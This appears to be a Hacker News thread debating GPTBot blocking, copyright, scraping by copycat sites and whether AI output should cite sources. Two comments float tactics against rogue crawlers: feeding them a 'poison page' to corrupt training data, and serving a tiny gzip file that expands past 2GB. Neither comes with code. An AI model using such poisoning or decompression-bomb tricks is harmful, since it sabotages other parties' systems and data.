26% of the top websites are now blocking GPTBot

entuno · on Sept 27, 2023

It's worth noting that in this case "blocking" means "asking nicely for it not to index them" - so how effective this is depends on how well behaved the bots are.

There is a danger though if certain types of sites are more likely to block GPTBot than others, because that would end up skewing the data set that it trains off, which could have longer term impacts on all the content generated with it. If all the good quality sites block it and the sites full of AI generated junk don't, then that sounds like a downward spiral.

rolph · on Sept 27, 2023

even worse, detect aibot dissrespecting robot.txt, and redirect it to a poison page

akira2501 · on Sept 27, 2023

You can also just do that for no particularly good reason. Language models aren't going to go anywhere particularly worthwhile if this is their primary mode of data gathering.

hinkley · on Sept 29, 2023

I needed to test whether an app could decompress inputs over 2GB properly. I was able to create a zip file that was about 45k to do it. I think the record is something like 5k, but 50k fits just fine in a repository.

Set up direct Gzip sendfile, and that’ll keep them busy for a while.

If I’m paying for servers by the hour and half of them are run just to keep the bots happy, I’m going to have opinions about who is allowed to visit my pages and for what reason. Mooches don’t have a moral leg to stand on.

galkk · on Sept 27, 2023

This is not a problem. They will just buy the data in bulk from some third party, what would do scraping for them.

I heard many instances of such things.

d3w4s9 · on Sept 27, 2023

Even without all those, suppose Washington Post publishes a big exclusive story, there are going to be many websites that paraphrase the article and likely link to it, many of which don't block GPT bot. Even without the exact words, with multiple sources GPT should be able to easily figure out the original story. I don't see blocking helpful in such cases.

JohnFen · on Sept 27, 2023

Yes, this (and that I don't trust the bots) is why I've removed my websites from being publicly accessible. It's the only way I can think of to be sure I'm not contributing to these models in any meaningful way.

barryrandall · on Sept 27, 2023

Most new content is scraped and reposted on dozens of copycat sites within minutes of being posted. Pinterest.com may have blocked gptbot, but MySketchyPinterestClone.net hasn't, and has all the same content.

red_trumpet · on Sept 27, 2023

Regardless of where you stand on the LLM vs Copyright debate, that 3rd party would clearly be violating copyright by selling unlicensed content, though?

drdaeman · on Sept 27, 2023

If a third party poses themselves as a network operator (basically, acts as a proxy/dumb pipe) or a library (if they have a cache) they aren't liable, are they? I think they aren't because proxy and VPN providers, or CloudFlare's 1.1.1.1, or The Internet Archive are AFAIK not generally considered liable in any sort of infringement.

rascul · on Sept 27, 2023

> The Internet Archive are AFAIK not generally considered liable in any sort of infringement.

Wasn't there a case earlier this year that found the Internet Archive liable for copyright infringement?

drdaeman · on Sept 27, 2023

Oh, I wasn't aware. Thank you for pointing out. From what I've read, even though there's an injunction, IA was going to appeal, so I hope this isn't exactly over yet?

amelius · on Sept 27, 2023

How clear is it who owns the copyright?

johneth · on Sept 27, 2023

The creator owns the copyright.

amelius · on Sept 27, 2023

Yes but if two websites show the same content, how do you prove you're the creator?

lokar · on Sept 27, 2023

The legal system has this figured out

amelius · on Sept 28, 2023

The legal system also figured out that if person A invents X, then person B cannot possibly independently have figured out X, see the patent system.

aeurielesn · on Sept 27, 2023

This. I think it's wildly overlooked by people. Isn't this how even government agencies do it?

accrual · on Sept 27, 2023

I don't own any revenue generating websites, but I do feel like the content I create is useful. I'd rather have GPT slurp it up with the hope of some small piece of me being emitted now or in the future for others to benefit from.

I'm sure my perspective would be different if I was paying my employees to create unique content for our brand, though.

I'm not sure though. At the end of the day, I think I'd rather information to be free. But that's not a sustainable model in many industries.

rolph · on Sept 27, 2023

attribution is just as free as information.

AI should not behave as if it has inherent knowledge, there should be aknowledgement similar to, 'i saw on the web the other day'; or 'i was cURLing on coolrecipies.com and it gave me a new idea for halloween cake'

drdaeman · on Sept 27, 2023

Humans skip attribution in their conversations all the time when it's not the subject. Why machine should be held to some different standards, especially if we want them to sound and behave naturally?

"I saw on the web the other day" is not attribution, it's basically an interjection that makes the conversation smoother. Most of time it means absolutely nothing, except for maybe "it's not my direct experience" at best (and AFAIK LLMs today don't really have any agency, so this disclaimer is moot/noise).

Sure, "I've read an article on Acme Daily" happens, but personally I typically do this as a cue for the listener to cut me off with "ah, yes, I've read this too", saving us both time. Other use case is to give signal about authenticity of the information: not a credit, again - just an indirect indicator of trustworthiness or reliability (when I hear "The Onion reports" - it's surely not about the website, it's about the following being satire). YMMV, of course. I sure want an LLM to write this, but only when it matters to me personally (not the website authors, they aren't a party in our conversation). Just like a human would.

Similarly, I don't think anyone ever said "I've found this on coolrecipes.com" unironically if the conversation is about the recipe instead of a source. Obviously, attributing it to someone both parties know - like a relative, neighbor or a celebrity is a different story - roughly the same as with the news example above. But if you hear "found on coolrecipes.com" it it's most likely an ad. And what I want to say is here is that LLMs today are a breath of fresh air - compared to modern enshittified search engines - specifically because they're not ad- and SEO-ruined (yet). Let us please keep it this way for as long as possible.

JambalayaJim · on Sept 29, 2023

> Humans skip attribution in their conversations all the time

ChatGPT is not a human. If a news site was to publish some information on their website without attribution, this would be a problem. ChatGPT is more analogous to a news site then some person you have a conversation with.

rqtwteye · on Sept 27, 2023

I think then you are back to search engines but presenting results slightly differently. The way I understand LLM works I think attribution is almost impossible.

none_to_remain · on Sept 27, 2023

And then you get a list of the nnn,000 sources substantially contributing to the model weights used to generate your output?

rolph · on Sept 27, 2023

conversational ai seems to be the big ask. if you verbally prompt the particular path to it you could start by stating that 'ive read a lot of highschoolbooks', and 'my teachers always said, that' 2+2= 4.

the idea is to enable the promptor to review the information, and see for themselves, should they have need.

2big2fail_47 · on Sept 27, 2023

fully agree. AI should cite and reference the material it's using

kenmacd · on Sept 27, 2023

And yet you didn't cite any of the reference material you used to post that reply, or any of the reference material that led to you having that opinion in the first place.

I'm not being flippant here. We all use massive amounts of reference material to even think the most basic thoughts. Expecting you—or an algorithm—to be able to quote or even know the reference material that let to anything you say is a pretty high bar.

drdaeman · on Sept 27, 2023

Worse - quite frequently reference material is a mashup of different ideas and stories that we've obtained from multiple sources over time.

Just like in literature - tropes are standalone entities, and they evolve over time. While a trope can be attributed to some book or author, it evolves, gets mixed up, gets deconstructed and may end up with something barely recognizable. Should LLM be forced to always give a nod to Azimov or Čapek when talking about, let's say, Bender from Futurama - if this is not explicitly relevant to the conversation? I highly doubt so - it would make conversations intolerably stuffy. Talking about virtually any topic would end with a footnotes list multiple pages long.

Our (human) "normal" common sense to attribution is to ditch any and all, unless it's relevant for some reason. Because we generally try to stay focused. People or conversation machines attributing recipes to website addresses is a Black Mirror episode material, a corporate wet dream.

dmonitor · on Sept 27, 2023

If the AI were a public utility, that would be great. Currently, we have to ask OpenAI/Microsoft for permission every time we want to access the knowledge source.

drdaeman · on Sept 27, 2023

True, but there are free and publicly available models and while they're considered to be worse than OpenAI offerings, they aren't that bad. Or at least I hope so.

marcinzm · on Sept 27, 2023

Good news for Google's AI teams since Google's AI scraping is harder to block unless websites want to not show up in google search results.

skilled · on Sept 27, 2023

I would love to sit down with any number of 10 random website owners / managers from this list and ask them the following questions:

- Why did you block GPTBot?

- Are you aware that your content is scraped, directly copied and otherwise repurposed by other website that don't block GPTBot?

- What are your plans if in future iterations of the GPT model you're going to see that the GPT model has information that you wrote or produced? Are you going to fight it, and if so - how are you going to do that?

I think these are legitimate questions and they are the ones that I would love to hear answers to because I would love nothing more than OpenAI being hamstrung based on the bullshit that they pulled last year with ChatGPT.

Never forget that OpenAI stole the web and has had $11.3B in funding[0] and is seeking another round to place it at a $80-90 billion valuation[1].

[0]: https://www.crunchbase.com/organization/openai/company_finan...

[1]: https://techcrunch.com/2023/09/26/openai-is-reportedly-raisi...

gavinhoward · on Sept 27, 2023

- Because I don't like AI, I don't like their business model, and I don't believe they have the right to do so.

- Yes, and I try to block them as I find them.

- I will fight it if I am capable because yes, OpenAI stole the web, and the more we can make them hurt for doing so, the better.

JohnFen · on Sept 27, 2023

> Why did you block GPTBot?

I block AI scrapers because I don't think that these systems are good for society and I don't want to help make them better.

> Are you aware that your content is scraped, directly copied and otherwise repurposed by other website that don't block GPTBot?

Yes, which is why I've removed my sites from being publicly accessible.

> What are your plans if in future iterations of the GPT model

None. There's nothing I can do about it after it's been ingested, so the only realistic thing to do is to let it go and do my best to prevent it from happening with new stuff.

BeFlatXIII · on Sept 27, 2023

"Stole the web"?

skilled · on Sept 27, 2023

No, they came up with all the data for their models themselves.

BeFlatXIII · on Sept 28, 2023

So they copied the data. No one was deprived of the originals.

skilled · on Sept 28, 2023

There is a big difference between copying and stealing. People who copy don’t get sued, people who steal do.

Although I am not exactly sure about the difference anyway.

Also, if you are going to make an argument, then please do it. I don’t exactly appreciate shallow comments when I have plenty of evidence to show as a rebuttal.

BeFlatXIII · on Sept 29, 2023

Plenty of people who don't steal get sued for IP theft because it's an easy shakedown.

johneth · on Sept 27, 2023

As long as ChatGPT offers few or no financial incentives to creators of media, this percentage will increase.

As they are at the moment, OpenAI are parasites.

drdaeman · on Sept 27, 2023

It's amusing how scale changes the landscape.

A human reads something for free or "free" (if they're a product for advertisers or data collectors). And no one bats an eye if they retell it to others. There are careers of this - teachers, instructors, advisors.

But if it's a a machine (or a superhuman - I want to hope hope we'll see AGI someday) that can do this at scale, the whole world is suddenly upside-down. I honestly have no idea how things should be (I have opinions, but I cannot really validate them, so they're just... opinions), but I find it interesting.

Being a pessimist and strong believer than humanity as a whole leans towards shittiest-but-cheapest solutions (down to a certain threshold, of course, but the plank is rarely high) my guess is that those websites will eventually try to monetize LLMs the way they do this with humans - by injecting ads in the information provided. Fear the day new breed of SEOs will start spamming, inventing fancier and fancier techniques of - ahem - enriching the models with customer-oriented targeted promotional materials (or whatever). And so the history will repeat itself.

kenmacd · on Sept 27, 2023

I really don't understand why sites would do this. To each their own, but it currently lowers my opinion of the site. I was disappointed to see NPR and Ars on the list.

JohnFen · on Sept 27, 2023

Why does it lower your opinion of such sites?

kenmacd · on Sept 27, 2023

That's a good question... I suppose it seems to me like they're trying to keep useful information locked down. Even though this bot isn't 'public', it's still feels a bit like they're an author saying they don't want their book in a library. Actually it's even worse than that because they want to pick and choose who is allowed to read their words.

I guess another way I see it is like the site has put a banner at the top saying I can read their content, but can't use anything I learn from it, and can't tell you or anyone else about anything I've read. I get that in this case the 'me' is an algorithm and not a person, but does that really matter? If I read a lot of info on welding and then offer a 'learn to weld' class, how much does that differ from what the openai algorithm is doing. (And if it is public, are these same sites going to welcome the bots? I doubt it)

It also seems rather reactive and not well thought out. To include a quote from an Ars article (which gptbot can't read):

> As a thought experiment, imagine an online business declaring that it didn't want its website indexed by Google in the year 2002—a self-defeating move when that was the most popular on-ramp for finding information online.[1]

Or a couple quote Stephen King on another site that gptbot can't read[2]:

> I have said in one of my few forays into nonfiction (On Writing) that you can’t learn to write unless you’re a reader, and unless you read a lot.

> Would I forbid the teaching (if that is the word) of my stories to computers? Not even if I could. I might as well be King Canute, forbidding the tide to come in. Or a Luddite trying to stop industrial progress by hammering a steam loom to pieces.

As I said, to each their own. I just would have expected a site like NPR, that lists it's mission as "to create a more informed public", to not take actions that work directly against that goal.

[1] https://arstechnica.com/information-technology/2023/08/opena...

[2] https://www.theatlantic.com/books/archive/2023/08/stephen-ki...

JohnFen · on Sept 27, 2023

Very interesting. It would never have occurred to me that anyone would equate "I don't want this to train AI" with "I don't want people to learn this".

Thank you for explaining.

tomaszs · on Sept 27, 2023

OpenAI tries to set a precedence for default approval for crawling and training AIs with copyrighted content. Compared to search crawling it doesn't proove to offer anything in return

More: https://tomaszs2.medium.com/ai-may-pirate-music-and-movies-1...